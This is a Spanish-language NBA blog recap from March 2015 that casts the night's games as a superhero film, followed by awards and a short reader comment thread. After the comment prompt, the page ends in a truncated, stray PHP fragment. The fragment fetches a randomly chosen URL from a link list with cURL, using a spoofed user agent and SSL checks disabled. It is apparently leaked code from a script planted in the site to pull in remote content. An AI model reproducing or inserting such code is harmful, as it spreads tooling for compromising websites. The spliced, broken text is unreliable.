La Crónica: Los Vengadores

05 de March de 2015 por MagicJohnson32

La jornada de anoche en la NBA fue una película de súper héroes. Pero no una película cualquiera, de bajo presupuesto, con un triste héroe delante de un triste croma. No, fue una gran producción, “Los Vengadores” en versión NBA, una cinta épica, repleta de seres extraordinarios llevando a cabo acciones extraordinarias, héroes enmarcaradados, hombres de acero, monstruos de la naturaleza y alguno que parece llegado de otro planeta.

Os explicamos el argumento.

Philadelphia 76ers 118 – OKC Thunder 123 (OT)

Como decimos, por haber, hubo hasta héroe enmascarado. De vuelta tras perderse un partido por una operación en la cara, Russell Westbrook, ataviado con una máscara protectora, siguió donde lo había dejado: con todo el peso de los Thunder sobre sus espaldas, y él, feliz del papel que le corresponde interpretar en ausencia de Kevin Durant. Además, OKC se encontró con unos Sixers peleones, en los que Isaiah Canaan se destapó y Jason Richardson reverdeció laureles. 5 triples sin falló de Canaan en el primer cuarto adelantaron al equipo visitante antes de que los Thunder respondiesen con un parcial de 0-15. El acierto no abandonó al base de los Sixers, que puso a los suyos 75-60 pero un nuevo parcial (esta vez, de 0-18) dejó a OKC en situación óptima para asegurar la victoria.  Esta vez fue Phily quien respondió con un parcial a la desesperada que mandó el partido a la prórroga, 5 minutos extra que permitieron a Westbrook alcanzar un nuevo triple doble y redondear con 10 puntos más una actuación digna de un súper héroe.

Memphis Grizzlies 102 – Houston Rockets 100

En el Toyota Center de Houston hubo héroes y villanos. El héroe que salió triunfante de la batalla fue Marc Gasol, mejor jugador de un partido que decidió él mismo con una sensacional canasta a una décima de la conclusión. Los villanos fueron los tres árbitros incapaces de ver la falta de Zach Randolph sobre James Harden unos segundos antes de la canasta de Gasol. El error arbitral y el acierto del pívot catalán frustraron la remontada de los Rockets, que se habían visto 12 puntos abajo mediado el último cuarto pero reaccionaron de la mano de un Terrence Jones mayúsculo hasta el punto de empatar. A la conclusión del partido, Courtney Lee aseguró que la clave para frenar a Harden es no hacer faltas; supongo que hacer faltas y que no te las piten es mejor aún.

Cleveland Cavaliers 120 – Toronto Raptors 112

Aunque si alguien representa el concepto de súper héroe en la NBA, el de alguien capaz de desafiar las leyes de la física hasta hacerlas trizas, ese es LeBron James. Ni siquiera una flagrante de Jonas Valanciunas, que acabaría con la mayoría de nosotros en el hospital, detuvo a James; al contrario, le espoleó, que es lo peor que te puede pasar cuando te enfrentas a LeBron, autor de 14 puntos en el último periodo para un total de 29, y lider del triunfo que deja en nada la distancia entre Raptors y Cavs en la clasificación del Este. Por parte canadiense, al menos se vio una mejor imagen que en recientes ocasiones. Sin Lowry, que sigue de baja, la anotación de DeRozan y Lou Williams, junto con la presencia interior de Valanciunas, sostuvieron a los Raptors frente al poderío del Big Three de los Cavs. Pero, tras el 97-97, los Cavs cerraron el partido con cinco minutos de infalibilidad absoluta, LeBron impuso su voluntad y los Raptors capitularon.

El resto de la jornada

La lucha por esas 2 últimas posiciones que dan acceso a los PO del Este continúa. Con su victoria sobre los Lakers, los Heat mantienen de momento la séptimo posición seguidos ahora de los Charlotte Hornets que arrasaron en su propia casa a los Nets en un duelo directo que prácticamente resolvieron en el primer cuarto. La llegada de Mo Williams ha sentado de perlas a los de Steve Clifford que encadenan 3 victorias consecutivas. Los Pacers superaron el Knick-trámite y son novenos a sólo media victoria de la postemporada. Mientras, los Celtics continúan haciendo la goma y se mantienen en la pelea gracias a esta canasta sobre la bocina de Tyler Zeller. En cambio los Pistons se desinflan poco a poco. Ayer cayeron ante Anthony Davis (tremendo retorno el suyo) y están ya a más de 3 victorias. Los Bucks cayeron por 4º partido consecutivo (ayer ante los Warriors) pero tienen suficiente ventaja como para no sufrir mucho.

En el Oeste también se queman los últimos cartuchos y nadie quiere dar su brazo a torcer. Aparte de los Thunder, ganaron Pelicans y Suns, estos últimos sudando en Orlando y con Brandon Knight como mejor hombre. Los Spurs celebraron su vuelta a casa tras 9 partidos arrasando a los Kings y evitan así meterse en problemas. En el partido intrascendente del día, segunda victoria en dos partidos de los Nuggets desde que echaron a Brian Shaw, esta última ante los Wolves.

PREMIOS

MVP: Comenzar una frase con “se nos acaban los calificativos para…” es todo un topicazo pero es que es real como la vida misma. Tras llamarle animal, bestia, fiera y calificarle como tremendo, fabuloso, gigantesco, enorme, imponente, etc… ¿Qué nos queda para definir a Russell Westbrook? 4ª triple-doble consecutivo con 49 puntos, 16 rebotes y 10 asistencias. Semejante actuación deja en segundo plano otra monstruosidad: los 39 puntos, 13 rebotes, 3 robos y 8 tapones de Anthony Davis.

Rookie: Los mejores del día fueron los mejores del año: Andrew Wiggins con 20 puntos y 5 rebotes y Elfrid Payton con 9 puntos, 10 asistencias, 4 rebotes y 5 robos.

Sorpresa: Todos contábamos que en Philadelphia Isaiah Canaan podía comenzar a protagonizar buenas actuaciones pero hasta el momento había pasado algo desapercibido. Hasta ayer. Ante Russell Westbrook anotó 31 puntos, cogió 7 rebotes y repartió 6 asistencias.

Decepción: Un destrozo, eso fue lo que los Spurs le hicieron a los Kings y DeMarcus Cousins fue de los más lo sufrieron. Se quedó en 14 puntos y 3 rebotes y perdió 5 balones. De todas maneras, peor lo hizo Serge Ibaka, capaz de anotar solo 2 puntos y capturar 2 rebotes en 31 minutos de juego.

Esfuerzo en vano: Sin Blake Griffin, Chris Paul es el alfa y el omega de los Clippers, el líder indiscutible. Su mejor rendimiento del curso coincide con la baja del ala-pívot. Ayer acabó el partido con 36 puntos y 12 asistencias, lo que significa que fue el responsable del 70% de los puntos que anotó su equipo.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. underlock dice:
    #1

    Otra actuación brutal de Whiteside con 18 puntos y 25 rebotes contra los Lakers. Menudo descubrimiento y encima con un contrato que es un lujo para la próxima temporada.

      Citar

  2. Jose Luis dice:
    #2

    Lo de la flagrante es una mariconada creo yo xD

      Citar

  3. Jose Luis dice:
    #3

    Y Randolph toca bola y brazo creo yo… a veces se pita y a veces no

      Citar

  4. Nacho dice:
    #4

    Jose Luis:
    Y Randolph toca bola y brazo creo yo… a veces se pita y a veces no

    Y creo que por ese orden. Vaya por la multitud de faltas que le pitan por ser quien es.

      Citar

  5. MagicJohnson32 dice:
    #5

    Venga hombre, es un faltón claro. Vale que Harden saca muchas faltas que no son pero ésta es clarísima y decisiva. Y si nos ponemos así, más faltas le dejan de pitar a Grizzlies que las que le pitan a Harden, jeje.

    PD: Sois unos haters xD

      Citar

  6. Jose Luis dice:
    #6

    MagicJohnson32:
    Venga hombre, es un faltón claro. Vale que Harden saca muchas faltas que no son pero ésta es clarísima y decisiva. Y si nos ponemos así, más faltas le dejan de pitar a Grizzlies que las que le pitan a Harden, jeje.

    PD: Sois unos haters xD

    bola y brazo xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>